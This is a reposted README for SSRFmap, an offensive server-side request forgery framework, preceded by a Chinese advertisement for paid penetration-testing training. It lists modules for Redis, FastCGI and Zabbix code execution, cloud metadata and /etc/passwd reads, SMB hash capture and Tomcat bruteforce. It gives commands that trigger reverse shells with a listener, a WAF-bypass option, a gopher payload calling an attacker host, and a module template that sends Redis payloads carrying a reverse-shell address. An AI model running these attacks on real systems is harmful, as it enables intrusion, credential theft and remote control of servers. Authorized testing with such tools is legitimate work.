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【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。


SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.



The following modules are already implemented and can be used with the -m argument.

fastcgiFastCGI RCE
redisRedis RCE
githubGithub Enterprise RCE < 2.8.7
zabbixZabbix RCE
mysqlMySQL Command execution
dockerDocker Infoleaks via API
smtpSMTP send mail
portscanScan top 8000 ports for the host
networkscanHTTP Ping sweep over the network
readfilesRead files such as /etc/passwd
alibabaRead files from the provider (e.g: meta-data, user-data)
awsRead files from the provider (e.g: meta-data, user-data)
gceRead files from the provider (e.g: meta-data, user-data)
digitaloceanRead files from the provider (e.g: meta-data, user-data)
socksproxySOCKS4 Proxy
smbhashForce an SMB authentication via a UNC Path
tomcatBruteforce attack against Tomcat Manager
customSend custom data to a listening service, e.g: netcat
memcacheStore data inside the memcache instance

Install and Manual

Basic install from the Github repository.

$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py

  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                    [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
                    [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]

  optional arguments:
    -h, --help          show this help message and exit
    -r REQFILE          SSRF Request file
    -p PARAM            SSRF Parameter to target
    -m MODULES          SSRF Modules to enable
    -l HANDLER          Start an handler for a reverse shell
    -v [VERBOSE]        Enable verbosity
    --lhost LHOST       LHOST reverse shell
    --lport LPORT       LPORT reverse shell
    --uagent USERAGENT  User Agent to use
    --ssl [SSL]         Use HTTPS without verification
    --level [LEVEL]     Level of test to perform (1-5, default: 1)


First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. They should look like the following. More examples are available in the /data folder.

POST /ssrf HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Upgrade-Insecure-Requests: 1


Use the -m followed by module name (separated by a , if you want to launch several modules).

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

If you need to have a custom user-agent use the --uagent. Some targets will use HTTPS, you can enable it with --ssl.

# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"

Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost= --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload

When the target is protected by a WAF or some filters you can try a wide range of payloads and encoding with the parameter --level.

# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: -> [::] -> 0000: -> ...

SSRFmap Tests

A quick way to test the framework can be done with data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles



I pull requests 🙂 Feel free to add any feature listed below or a new service.

  • Redis PHP Exploitation
  • HTTP module (Jenkins ?)
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A

The following code is a template if you wish to add a module interacting with a service.

from core.utils import *
import logging

name          = "servicename in lowercase"
description   = "ServiceName RCE - What does it do"
author        = "Name or pseudo of the author"
documentation = ["http://link_to_a_research", "http://another_link"]

class exploit():
    SERVER_HOST = ""
    SERVER_PORT = "4242"

    def __init__(self, requester, args):
        logging.info("Module '{}' launched !".format(name))

        # Handle args for reverse shell
        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
        else:                  self.SERVER_HOST = args.lhost

        if args.lport == None: self.SERVER_PORT = input("Server Port:")
        else:                  self.SERVER_PORT = args.lport

        # Data for the service
        # Using a generator to create the host list
        # Edit the following ip if you need to target something else
        gen_host = gen_ip_list("", args.level)
        for ip in gen_host:
            port = "6379"
            data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
            payload = wrapper_gopher(data, ip , port)

            # Handle args for reverse shell
            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)

            # Send the payload
            r = requester.do_request(args.param, payload)





